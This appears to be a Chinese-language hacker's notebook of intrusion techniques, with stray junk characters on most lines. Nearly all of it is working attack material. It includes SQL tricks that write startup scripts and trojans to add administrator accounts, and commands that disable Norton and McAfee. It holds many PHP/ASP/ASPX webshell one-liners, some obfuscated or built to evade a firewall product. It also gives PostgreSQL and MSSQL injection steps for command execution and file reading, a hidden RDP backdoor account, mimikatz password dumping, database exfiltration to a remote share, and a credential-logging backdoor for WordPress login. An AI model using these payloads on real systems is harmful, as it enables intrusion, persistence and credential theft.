: z: Z& e$ R9 N' k: `+ E( kinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
8 S+ t3 k+ t. m2 J9 z& ^insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
, `- k5 [ i' w" o6 j2 M9 jinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
- i' v# n2 A2 V( t( F- X' ^. zselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";8 T/ B6 I; I: [$ e0 ?
drop table a;
( e. U, G/ z$ ^9 I. e% O6 [( ~
# a" X- S$ K6 {1 ?: k3 w英文版本:
" Z$ A! q7 A0 }" F9 E E5 U2 s# o$ ]
( X# y% _# S8 A+ Tuse test;! S* B6 U. [! h) S: z2 b
create table a (cmd text);
+ j" u _6 c8 ?! }% K) Vinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
T1 D7 k1 h9 S) Finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 X* G. R- E* {" p% ^7 ?& p
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );: L, m& _( {+ ]4 Y+ _9 a
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";+ z% I" l4 J* }4 B
drop table a;0 c! U1 l1 T2 y0 r
2 g* B* d( S- z( O5 S% lcreate table a (cmd BLOB);
+ P% c/ ?1 I; B5 \# V; H, Tinsert into a values (CONVERT(木马的16进制代码,CHAR));4 S6 Z" Y: f5 S6 q1 A" w% D6 n
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'3 Y; x, d, Q+ Q" I+ ^: f* i+ C& L, \
drop table a;' w/ l! c1 I' f. A
( A- \( M* P/ t! e5 a记录一下怎么处理变态诺顿& W: ]6 J8 _* p$ o+ Q/ ^
查看诺顿服务的路径
+ ~9 u4 ]9 ]5 ?sc qc ccSetMgr
# z0 J2 c0 C: F' G" U然后设置权限拒绝访问。做绝一点。。
; ^$ y" e, C& t' B" {- O) _cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system- T7 d+ g7 U) j
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"4 d8 |. |( H# w' Z/ e& e1 v, w; N
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators4 p% q$ H, x( s6 z9 k/ B7 _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
$ f' M. a. y- f1 G: H8 J |. K8 G
7 R/ ~0 b, S A+ M$ G5 P- P: n然后再重启服务器
8 r6 W9 q9 v$ n2 k- piisreset /reboot
3 \( H( N# Y1 ?这样就搞定了。。不过完事后。记得恢复权限。。。。5 q) q, e- p f; u
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F' [" x( A5 f% Q) ]5 B; I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
/ r6 y0 a+ n/ I; z" o& E3 c. A3 ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
, O( i; i9 g" z' }. N/ }. Ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
% ^2 a6 Q6 Q& Z1 s9 {7 vSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin5 o' m" A$ s* v( U6 e. ~
5 o- W( h3 ~; v- `6 i& EEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 }& x5 Y! l5 Y2 C* |$ h) u* W0 A
, H+ a3 z3 J# Y0 k3 Zpostgresql注射的一些东西
1 F9 m: Z m: i; k$ P$ y) G3 h% S: G如何获得webshell
; n- M8 {0 f# [7 ohttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
7 O0 B, p0 L O8 o6 a( [( lhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
+ l/ S' Y9 S2 L$ v. A3 l- G: dhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;' C7 R$ g- l# p" k/ z
如何读文件
9 Y: ]3 l( m- S$ t* T# ehttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
: }+ ]. F0 Z" bhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
$ Q4 J2 J. P0 M3 |. b J, `8 w5 o* q; i; [http://127.0.0.1/postgresql.php?id=1;select * from myfile;2 h. p1 ~& }/ K3 ]/ f, ~
: Z0 G( I, b9 T* O+ Y. H& R
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
4 x) z7 B2 b% e$ h! U0 }当然,这些的postgresql的数据库版本必须大于8.X" _) G, Z! W+ c% F e9 [
创建一个system的函数:9 a. W0 T! `3 C/ L0 L8 c
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
D1 }9 n& i* I; N
; e" d* I) c5 ~) j" `. V创建一个输出表:
# x$ R& M" g3 y2 f7 d3 h" t& `CREATE TABLE stdout(id serial, system_out text)3 O4 e, k1 c% H- | F- h2 r {
; L/ j' T. ~- g' q9 Y% a% s; O5 y1 P执行shell,输出到输出表内:
1 t2 r) Z) Q q# ~$ NSELECT system('uname -a > /tmp/test')
3 G' ?2 H0 g4 \5 a
4 J) a; [9 W; Y0 w. J6 Y/ G) D; A0 hcopy 输出的内容到表里面;
. m3 A O0 z- H: l2 V" q( l; [COPY stdout(system_out) FROM '/tmp/test'
6 w9 C) ^5 ~$ a! X
8 m6 ~! l& j# a2 f4 p: U从输出表内读取执行后的回显,判断是否执行成功
4 b$ ?) H8 @* ~) ?
; y8 Y( S; }9 G& ?* MSELECT system_out FROM stdout& r( x; U+ |- l) x; o. Q6 v
下面是测试例子) o5 A, j R5 O7 B d
8 h1 Q( z. D5 A2 v! S+ g3 W' \
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- + O6 i+ G* b( L( w
/ r9 C. N3 Z% D
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
& w( ?" d0 o+ C; fSTRICT --
' a/ |6 t8 r$ I1 Y6 T% x
8 X9 q" C$ S e- G$ q/store.php?id=1; SELECT system('uname -a > /tmp/test') --. @5 |) y _" E+ I0 C% K& O, y! t
: K2 x) k u3 S; v3 w7 t/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
2 h5 q$ o% [. p, G3 o( m6 |
9 {" q4 X, [4 B. E/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
# M7 F+ D! x7 W) i% fnet stop sharedaccess stop the default firewall4 H. D9 J- \8 s7 t
netsh firewall show show/config default firewall
2 J" P' U' s" J! K* L/ U4 k; u1 xnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
& a3 E! ?; }% k$ G3 A# K+ Onetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
) v. o& p& ?$ ]- L& R2 n7 m修改3389端口方法(修改后不易被扫出)
9 Z/ ~ h0 H, W3 j修改服务器端的端口设置,注册表有2个地方需要修改. s! q/ ~$ }6 u# |8 E6 t, T
" P) S* v+ A; m9 m, E; H# N
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]+ S! ?7 @ X0 H% v! R6 |
PortNumber值,默认是3389,修改成所希望的端口,比如6000/ y: I4 R/ f' P2 K, `; |
5 Q' A; g5 y- T; y
第二个地方:
6 G; y5 P! d) i4 `8 y[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
% Y0 D7 O( h- A- BPortNumber值,默认是3389,修改成所希望的端口,比如6000
+ V7 ~' Z" Q* s" o0 u+ F- z) }; B: H: [
现在这样就可以了。重启系统就可以了0 J3 N* Q6 o) j
% L* R7 O: k6 m& |! v `查看3389远程登录的脚本- w4 j+ L4 M/ ?7 m+ O
保存为一个bat文件) K* a7 k& ^# P+ t, U2 N
date /t >>D:\sec\TSlog\ts.log. v4 X$ [& ^- A" e- r
time /t >>D:\sec\TSlog\ts.log& Y, a, |: }* q% ]' W- H( ?
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
- f- p* F6 p( O$ \) J. C: ^start Explorer7 R- g6 V, q8 d* N( V5 D$ A
' Y2 a1 O! B% A4 F5 r, \mstsc的参数:
/ P3 k5 P; {( t! q8 l/ C
5 S/ O- ?% I2 y9 H7 S远程桌面连接4 v9 ~ |+ F0 g% y2 B% n$ H
& t4 X' b. @2 F. k( Z2 e
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
2 K6 a8 l# }6 |' O# r0 n9 G [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
+ z: v% p9 R0 U) V3 \
{3 _' B: a; ^6 Q w7 ~<Connection File> -- 指定连接的 .rdp 文件的名称。
( O ^. W9 G% X! m8 K' q1 x. f) e/ G1 M$ `/ _
/v:<server[:port]> -- 指定要连接到的终端服务器。" G+ L- F; u: |- p! L4 V2 }; f' A
' r7 @! \0 x$ \, `/ K+ @
/console -- 连接到服务器的控制台会话。3 C8 P: M$ P* }( t# z& }( Z7 X$ w
0 W% H# V0 a9 g/f -- 以全屏模式启动客户端。7 o0 f" C; W: h7 L3 j6 i
8 D8 i: S. c* L! n- z
/w:<width> -- 指定远程桌面屏幕的宽度。
i% V7 e' e" @9 `( w/ `0 |; U4 Y$ ~0 U3 Z
/h:<height> -- 指定远程桌面屏幕的高度。) O# [6 {1 C2 d) N+ E) S
& B/ b' j/ w( H& [# @" [
/edit -- 打开指定的 .rdp 文件来编辑。) b7 {) n, Y7 V- |2 f' V# {
: l) O( I: g$ C4 Z
/migrate -- 将客户端连接管理器创建的旧版
+ y9 ?! E0 q4 [! P: S连接文件迁移到新的 .rdp 连接文件。8 _6 ^0 @% D; T; @+ y$ k* g4 |
5 q( e- B3 s% P
4 `' T- c0 H7 {9 q0 w" d# b& K6 _; Q, T5 y其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
$ V- K$ k, F( n' l9 rmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
3 H' z( m1 o: f m4 f, {" X* E. w* C7 y2 C( E
命令行下开启33898 W& h, @$ b! Y' V1 l! S: ]
net user asp.net aspnet /add0 _/ M$ e% f; ~ Z7 q
net localgroup Administrators asp.net /add- c7 R8 S& \1 ^5 @1 a
net localgroup "Remote Desktop Users" asp.net /add# D) ?( q6 D9 Z
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
. v& s" t. M' `+ j4 fecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0" j0 w& s, U2 T& N0 c+ ~
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1( W. |- z2 p. {1 ^
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
# C# p X4 _0 r* Zsc config rasman start= auto
9 z' u* }) A. k7 \7 asc config remoteaccess start= auto/ e7 C; Y4 Y) w- A9 z6 ?
net start rasman
( m+ U$ S/ u% _# C& H' `net start remoteaccess
: t5 k- x, E. I5 r0 kMedia) w( K' B+ Q3 z2 X
<form id="frmUpload" enctype="multipart/form-data"
, M7 R. Q" u' x6 ?# ~- haction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>7 e$ p I5 Y) n
<input type="file" name="NewFile" size="50"><br>
. d7 w' g( O) o' i2 w* o5 @5 v<input id="btnUpload" type="submit" value="Upload">1 l! W+ [% B. k. L3 m3 `& f
</form>' v* Q) y7 M- q. f! A1 d: y. v$ d
$ G3 _) i( y$ w& Kcontrol userpasswords2 查看用户的密码0 b3 V( N; q5 s* b+ e+ P
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径# _$ Y- c2 v' Z( \9 l- v
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a1 E) h1 s) d8 B! a b
$ ? [' @2 ]4 [% x! G
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:& i0 w, f6 W! a4 \( D, m
测试1:- f8 X) `8 i/ ~# t0 o% H: W: t' B
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# {6 ^- t2 q2 \, ?6 x A4 t; J! v
1 x6 a/ D; }0 o) ~0 b7 u测试2:
/ e5 e& J- ]0 \/ D: J3 I, }( g, P' H' W: w& g1 c* { H
create table dirs(paths varchar(100),paths1 varchar(100), id int), N3 U# B+ a' q' c- X
; {0 u9 X7 l! k2 G& Bdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--9 v5 J( k2 X6 i/ j9 z
3 L4 r4 X2 `# Q, h' ?; z; O$ X
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
) ~' Y" S; i: ^ b7 c$ Q; F关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令+ m2 L/ W0 L% \' Y2 |
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;3 y- c' P% F5 v, O* Q# Z) O
net stop mcafeeframework& S; q) |5 G- u4 B
net stop mcshield
3 l4 F/ Y: ?- f/ t7 P3 j7 {/ @( lnet stop mcafeeengineservice
2 }' y; J& y! Y1 Z3 Wnet stop mctaskmanager; ]* j& r" O3 P
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D( p% Z/ w' \# H% `$ i! k6 w( o* H
' Z- K- w: u$ N VNCDump.zip (4.76 KB, 下载次数: 1)
* X3 C: {/ `% N: ^密码在线破解http://tools88.com/safe/vnc.php8 B' ]* V" t$ Z7 S+ _$ m. a' S
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取2 J/ d8 T: m. `/ w2 \& ^
M9 B9 i# h+ }8 a; E
exec master..xp_cmdshell 'net user'
' A8 p1 E+ h: Ymssql执行命令。. f" @) D1 V/ m0 o6 a
获取mssql的密码hash查询) m ]& s" h1 b: L
select name,password from master.dbo.sysxlogins
- d2 a0 S j7 K+ `
* j8 x! f# `- B! Vbackup log dbName with NO_LOG;
" X/ A( ^! d6 a& Cbackup log dbName with TRUNCATE_ONLY;/ d5 G, d4 y+ H* K' H# q* h
DBCC SHRINKDATABASE(dbName);4 w6 {( l( c& M6 N8 v! N" \
mssql数据库压缩
6 _) m% `6 D, m% Z6 D0 `9 q$ a" U. a" W* Q. |: r, N) @1 [
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
% m) R% t5 [" c& L将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。2 D0 f# i, Y* a, G7 T: u
9 Z- L. c- {9 R
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
' \2 f. T) Z4 P1 T备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak' D% v( v; l6 x6 G, s- K7 b
8 q- U- ~2 B, x3 M! V- q3 CDiscuz!nt35渗透要点:5 E$ F8 ` R* C# z/ q1 D
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default, _7 t5 H) E4 t5 S. U0 z) c
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
+ u. i$ X, O- `) ]+ Q8 k( t' v(3)保存。$ L$ ]7 A2 G3 R& j4 j6 }
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass" i2 }2 u) X! _, I& Z
d:\rar.exe a -r d:\1.rar d:\website\- H* l1 o* b! m5 U' o2 R: P, K
递归压缩website
9 {& _8 Y0 r( c1 f注意rar.exe的路径
& e6 E8 @ W: u5 c* d; I! ~
8 K1 Y: `: F/ d7 r$ I/ A<?php7 q2 {; X. G1 t9 h9 Y& Q% a5 Q- c
, Y7 V( ?# b! g1 E3 W5 s
$telok = "0${@eval($_POST[xxoo])}";
" G1 w( l* `: y- U7 r
% J1 ^+ p, ^1 K5 C$username = "123456";6 y$ X# ^" o! r
& @7 A; |9 ^. Z+ s
$userpwd = "123456";3 {( Z$ @6 H1 S7 C s4 E& p
: T0 ~6 }, A; C* N$telhao = "123456";% T9 S' v; x* O" e$ l! j
+ n }+ ^' \; C: a1 F* K$telinfo = "123456";
3 i- a* `3 q# e. {5 Q
. ^% K# R; t! C?>4 M9 u8 A' d5 j! f% d6 o
php一句话未过滤插入一句话木马
- Y8 c/ u% |3 k& X" G
( N6 |3 Q5 v \4 \& m. U站库分离脱裤技巧
6 D# n5 `1 ?0 `6 lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'/ \8 |! m0 {+ y
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'* D6 k q& s; E8 F0 O* d
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
& z7 a, J" P% d2 K这儿利用的是马儿的专家模式(自己写代码)。% }' {6 R" v/ c; W5 M7 g; t) x
ini_set('display_errors', 1);
J6 ^: F6 r; o- @( B; oset_time_limit(0);
0 v8 k1 u0 v }0 s* ?0 r* eerror_reporting(E_ALL);& [8 {" w5 ~8 t7 ~- N' N
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
4 ^' x- @& f) Rmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
_- p3 j; ^4 P# Z% k& G$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
" x5 x" Y: ~ o% k- I) f! Z! o$i = 0;
# H# w$ t! t3 K. S$tmp = '';
' f+ N" w8 v2 M# ^0 @( `6 @2 B+ s0 dwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
" T4 h/ [5 P! \+ z4 m$ z$ p4 ` $i = $i+1;
% P9 U! Q4 h( L! X H$ t $tmp .= implode("::", $row)."\n";9 G5 u# L* v8 s: @
if(!($i%500)){//500条写入一个文件5 O. y$ X8 V6 c: k- I( U5 q
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
& I) h3 ^" k( I& W file_put_contents($filename,$tmp);" }3 E* {5 H( Y* W8 u! F
$tmp = '';
: R0 R% V* j4 y }& O4 O2 u2 f5 \4 K& f/ H6 E5 p
}
$ A& ^; s5 b/ N/ M8 O6 rmysql_free_result($result);! k8 D; d6 X5 T6 \
. N3 |) s; v+ h9 Y
/ q4 }; S& G9 E% L9 j1 w7 d, X* R9 a \9 w6 G; L2 J- I5 E
//down完后delete
# s4 W% G* `4 E; N7 s. h |$ y3 |/ [% Y$ }
0 X( n/ O/ E) a/ k, C2 cini_set('display_errors', 1);, ~9 \( H; T7 ?0 R# S# m
error_reporting(E_ALL);+ G m0 P, W$ _6 W- m R1 p
$i = 0;
2 y1 Z! P" S& T3 I5 ]; |while($i<32) {7 [ \) P2 ^3 d9 D
$i = $i+1;
0 c' x* \8 v0 X7 Q" s $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
: ^& o* d5 J! M! W unlink($filename);
, j: Y( Q- B. r4 U} # o* E0 ^5 ]% w+ S8 G$ Z
httprint 收集操作系统指纹
, }3 x* e$ \7 C, i+ i扫描192.168.1.100的所有端口2 Q* a1 k% b* Y4 `
nmap –PN –sT –sV –p0-65535 192.168.1.100
' P* `* ~) o8 J$ qhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
1 ?6 _4 y B+ B" w: Xhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输- k! P% s$ ~, g r- g
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host& ?/ |8 P( s s+ v2 C/ v
5 Q2 B. k1 W0 Z7 \2 v' i R* O* f
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)+ n- i: {. W7 f
; y9 k% t7 ^* c/ j7 \! ]. ~3 v MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
v3 K+ N% u7 C0 r
. l* a; V0 \/ G; U1 s" k Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
& z; ^2 d# q0 ^0 \* @: q2 ?3 C6 N7 }. C
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
3 h' u1 V- d5 X& S; Y- d+ X% C
http://net-square.com/msnpawn/index.shtml (要求安装)
9 B6 Z9 S. S6 A: `3 a( Q8 i G# N% t+ X! T9 j7 ^3 t
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)- x" L, u+ f6 A- r! q- f& u
: j$ h3 l! X# O8 |" R; E$ v SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)3 {7 N8 B1 b: l
set names gb2312
) u9 c$ I% z* }) \导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。5 O) R1 I/ e( q' f, c8 _
) \+ K5 X$ a/ v% wmysql 密码修改7 P: j# W8 a9 n& Z* y" Q4 B
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” . ]- ~% o% @9 ~8 ^ q7 [
update user set password=PASSWORD('antian365.com') where user='root';, @; S3 B$ v/ R$ b
flush privileges;6 a' j: q* V! K
高级的PHP一句话木马后门
2 _0 A8 O, y _: E0 q% @2 [! q& x" a% u& F6 L( H* E: R$ P
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀( K7 J9 P& c8 J& l. M
, Q* S% U, e: w9 {. e0 L0 H1、8 e& c9 u; c9 O7 R
% f) K# D+ c% K: [6 ]3 r$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 v0 |# v+ ]3 A+ F9 n( b
* q8 V' w1 B7 x& J1 Y/ U: Y
$hh("/[discuz]/e",$_POST['h'],"Access");5 r0 M; b+ w( y1 }( u
: V9 J8 k$ h' ?) D) M
//菜刀一句话$ z( l& {) A5 Q8 j4 ^
) y9 ?1 {% c" o) ]2、: }1 X4 o: G3 i+ y! d8 C
( R, Q5 a4 T D
$filename=$_GET['xbid'];
* _, X0 [1 t' ~1 V. j& `7 O, A4 d R7 y
include ($filename);' e! j( R( a5 H7 {8 n
9 O$ o& P" B! q+ T2 g4 Q" ~
//危险的include函数,直接编译任何文件为php格式运行1 X4 Q& }& v9 l4 f4 h
) }0 s7 p* w V! x) Y( o" d3、
$ `' I, E; C' Y9 f2 O% _( R" u: L' g" M
$reg="c"."o"."p"."y";
/ Q7 W- Z: ]4 |; e; u4 ~* A! r, W6 O1 u/ p) r1 d$ W
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);( P* ^# f+ l0 g% j$ y
0 s) j4 T' J: |- M0 D) p8 ?
//重命名任何文件1 c" M. t8 [ }, K& B7 \
4 ]4 g/ C, B2 t% t/ m5 A
4、; _) ]7 A: c! i( E' T
) L2 e& u. p% G Q0 G; d: a$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 f- i, T: w+ Y& r9 t
1 f, g E0 v. p Z; @3 B( Z) W$ f
$gzid("/[discuz]/e",$_POST['h'],"Access");
! u, a) ^& X) E, G( D) q
# m; Q* Z$ M1 w9 ~" X//菜刀一句话
8 u% o" s \: o% j% D, U4 r/ t! r) w' \$ z; j+ P: @* d0 |
5、include ($uid);
. Y1 |: w4 p1 E* J! G
, w1 v: _( E/ k+ u! C//危险的include函数,直接编译任何文件为php格式运行,POST ) v$ c* u/ C* _8 `' l0 @( s
: N \ s! Z! R, L! S$ H6 T) m
( c$ t' u( q; z' w, B//gif插一句话% k6 y2 C7 n$ R2 j
6 s) v+ z( \2 W' O7 p
6、典型一句话
! B: P3 f: A N9 R- ]6 [+ f* e6 V% w
程序后门代码
3 A0 Z4 q; ?& N9 n/ t- P8 t$ K" H<?php eval_r($_POST[sb])?>( Z3 Z* R# t5 y5 S+ W+ [
程序代码1 V% f2 w: ^ g1 N% @. d
<?php @eval_r($_POST[sb])?># x1 n- X0 J% a) A7 T
//容错代码4 m3 v& \* y d- A3 Q. n; I
程序代码
3 t* `1 y) H: N9 ^; f/ e( L$ R& p<?php assert($_POST[sb]);?>
/ L" Z: H2 P3 j& K, K3 N//使用lanker一句话客户端的专家模式执行相关的php语句
5 |) ^4 c( I- N* j7 u* _程序代码$ f& P* @7 U# K/ W
<?$_POST['sa']($_POST['sb']);?>
, u2 w: G( {# d, L% k( F; p程序代码# Y0 ^: h5 M- b& I5 F7 W" t+ l
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
* |* m- [* h/ G: T3 g程序代码
) A' V# I) M- {' v8 j: ~<?php
" z/ h6 T% ~5 |* Z9 H@preg_replace("/[email]/e",$_POST['h'],"error");
& x* ]4 x$ r$ }" R+ [4 k* N?>
# ~! }/ y7 t, y% s//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入4 Z3 e' h/ `5 ~ N% m0 ~/ ~
程序代码8 t0 {' ?/ N, b* {1 E9 b: Y
<O>h=@eval_r($_POST[c]);</O>, M) K" T3 X8 [3 ]/ K
程序代码
! W7 T9 Z* ?9 E* ~! ?% u: k<script language="php">@eval_r($_POST[sb])</script>
8 `8 g' x( Q. ~! c3 w1 Q* j//绕过<?限制的一句话
@( G" j2 V$ H3 B4 \% g6 P( h" _
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
9 u o0 F2 i8 {$ [/ d- W+ L% j. C详细用法:
' F( d! ?& p4 }. |- W* P% R1、到tools目录。psexec \\127.0.0.1 cmd5 N' j+ B- K0 H4 L8 ^6 c
2、执行mimikatz! s# D# @+ V* v" {4 Z3 e) B
3、执行 privilege::debug
* e% z" p4 G" b( Z4、执行 inject::process lsass.exe sekurlsa.dll
6 B! R7 t" h- T8 X5 L$ a5、执行@getLogonPasswords% _# {0 E4 q0 V8 v" p
6、widget就是密码, L' n/ _1 N! a; r' Y" T% z
7、exit退出,不要直接关闭否则系统会崩溃。
4 S9 i5 f# l3 k7 q$ v4 L
: E7 r1 z# J5 D; j6 o ahttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
: @. @" `+ |5 A% k. Z& E+ u8 h7 O4 u5 W. X8 I' B; l! ^! @8 F. r
自动查找系统高危补丁4 ]& T* K% D+ F0 u8 |6 S& A. h
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt4 Q- q# _7 k* S
4 e' ^7 e" P- Z& u5 d2 a# z
突破安全狗的一句话aspx后门0 X( G. o$ i; T
<%@ Page Language="C#" ValidateRequest="false" %>
5 B y6 T# a- z0 ]8 k8 w, u: H1 O<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>' U- X2 Q( Q3 f- N% ?6 z: S
webshell下记录WordPress登陆密码1 w1 g% D* ^2 y0 o8 k/ B
webshell下记录Wordpress登陆密码方便进一步社工7 q" f% \% E# S+ m5 w
在文件wp-login.php中539行处添加:
/ m2 `6 d8 o4 P# L6 Y0 D7 S* A// log password# t1 \% v# j' E$ p5 T! B0 T8 p
$log_user=$_POST['log'];- g4 Z8 g# x9 y. ^' `2 K
$log_pwd=$_POST['pwd'];% b0 Q2 G/ u& a* G1 q. Q; l" u
$log_ip=$_SERVER["REMOTE_ADDR"];% q/ t7 W" X9 a1 {* V" b
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;* k5 j6 Z4 K4 o' Z+ X) q
$txt=$txt.”\r\n”;
+ W- V G+ L# z# n2 f. g, Uif($log_user&&$log_pwd&&$log_ip){
C+ S4 m9 @, Y0 l& c@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
1 {2 k. R3 a* S% i& U3 a3 x}9 k& m( b0 [% p0 ~& X7 K
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。# |/ u9 E P, e( w. H
就是搜索case ‘login’
- T& C- \2 H: W) z在它下面直接插入即可,记录的密码生成在pwd.txt中,2 T( y2 [7 `1 d5 B* @! n/ z f, u
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录; Z9 h) v1 B! a6 b
利用II6文件解析漏洞绕过安全狗代码:# d, J. `$ t; V, S& B3 a; G
